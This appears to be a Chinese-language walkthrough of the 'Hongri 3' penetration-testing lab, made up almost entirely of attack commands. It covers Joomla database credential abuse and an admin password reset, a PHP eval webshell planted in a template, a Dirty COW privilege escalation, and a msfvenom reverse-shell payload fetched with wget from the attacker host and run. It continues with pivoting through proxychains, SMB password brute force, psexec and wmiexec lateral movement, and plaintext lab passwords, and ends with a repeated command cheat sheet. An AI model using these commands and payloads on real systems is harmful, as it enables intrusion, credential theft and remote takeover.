红日三靶场

红日三
黑盒测试都不知道密码
知道web-centos是192.168.0.105
kali跟web-cenos都是桥接物理网络

1.nmap -T4 -O 192.168.0.104 查看开放端口 因为不知到版本可以加上-sV 查看发现是Linux的看到开放 80,3306,22端口
2.dirsearch -u http://192.168.0.104/ --exclude-status 400,401,403,404,405,501,503
  dirsearch -u http://192.168.0.104/ -e* 都可以扫描网站发现了/administrator进去查看一下，发现了joomla-cms网站
这个网站有固定漏洞configuration.php里面会有那个MySQL的账号密码
3.mysql -h 192.168.0.104 -u 账号 -p           
  在输入密码就可以进去
 show databases;
use joomals;
show tables;
select * from am2zu_users;
update am2zu_users set password=md5("123456") where id=891;
把登录的 am2zu的password改成123456，在那个joomla-cms登入用那个找到的administrator 和123456登入
4.因为是joomla在template中可以写入木马注意格式<?php eval($_POST'a']);?>
Editing file "/error.php" in template "beez3".根据给的话去推测路径因为dirsearch 扫描/templates/ 有这个可以推测
路径http://192.168.0.104/templates/beez3/error.php
5.用蚁剑连接一下发现了命令执行不了用插件绕过，发现插件绕过只能Linux用，把蚁剑装到kali里面去，在连接一下发现可以用，点一下php7_GC_uaf   php7_backtrace_uaf 发现得点两个才可以用可以成功命令执行但是是在192.168.93.120中
6.发现joomla可以ssh远程连接，刚好192.168.0.104有开放端口22ssh但是ssh需要那个账号密码，刚刚好去蚁剑找的c盘中的tmp有许多的账号密码而且是漏洞刚刚好找到账号密码
ssh wwwuser@192.168.0.104这个不行
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.104    加上参数可以了
7.发现权限不够用脏牛漏洞提权（可以 firefart的管理员账号然后密码自定义）
先在本地下好脏牛的脚本    在kali中开 python3 -m http.server让192.168.0.104下载
wget http://192.168.0.105:8000/dirty.c（kali的地址）
 gcc -pthread dirty.c -o dirty -lcrypt
rm /tmp/passwd.bak
./dirty 123456
su firefart
123456
8.做好了以后uname -a 看看Linux的位数发现是x64的
9.
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.105 lport=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf
造木马，在192.168.0.104下一下
wget http://192.168.0.105:8000/shell.elf（kali的地址）
chmod +x  shell.elf
./shell.elf
执行
10. kali开启监听
use exploit/multi/handler 
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 7777
run
11.  成功执行
run post/multi/manage/autoroute（添加全部记录）
run autoroute -p 
run post/multi/gather/ping_sweep rhosts=192.168.93.0/24
添加记录
12.内网信息探测 
use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
 set threads 10
run
可以用那个proxychains开代理 proxychains nmap -Pn -sT -sV 192.168.93.10 -F
还有端口扫描
发现了其他的主机端口开放跟端口
     10.20.30 都是windows    100.120是Linux跟ubuntu
13   

192.168.93.10   20    30  都开放了445端口

看看永恒之蓝可以不发现不行，看看能不能用smb爆破出来密码，
use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.93.10
set smbuser administrator
run可以
20  密码   123qwe!ASD
30      123qwe!ASD
10     zxcASDqw123!!

14.  用smb凭证攻击试试
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
 set rhosts 192.168.93.30
run
发现都可以但是有一个10 不行
用那个impacket-master/examples中的wmiexec.py 可以攻击不
proxychains python3 wmiexec.py 'administrator:zxcASDqw123!!@192.168.93.10'
可以
可以尝试扫描一下再那个windows上传fscan扫描一下内网

15 192.168.93.100 跟192.168.93.120都开放了3306MySQL（可能有弱口令漏洞）

show databases;
use joomals;
select * from am2zu_users;
update am2zu_users set password=md5("123456") where id=891;
ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.104
wwwuser_123Aqx
ssh wwwuser@192.168.0.104
python3 -m http.server
wget http://192.168.0.104:8000/dirty.c
gcc -pthread dirty.c -o dirty -lcrypt
rm /tmp/passwd.bak
./dirty 123456
su firefart
123456
wget  http://192.168.0.107:8000/shell.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.104 lport=7777 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf > shell.elf

use auxiliary/scanner/discovery/udp_probe
set rhosts 192.168.93.0-255
 set threads 10
run

proxychains nmap -Pn -sT -sV 192.168.93.10 -F

use auxiliary/scanner/smb/smb_login
set pass_file /root/Desktop/a.txt
set rhosts 192.168.93.10
set smbuser administrator
run

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
set smbuser administrator
set smbpass 123qwe!ASD
 set rhosts 192.168.93.30
run

80 web端口
135 rpc漏洞
445,139永恒之蓝端口 主要是445
3306 MySQL端口
3389 远程控制 端口
7001 weblogic漏洞
22  ssh端口
23 telent端口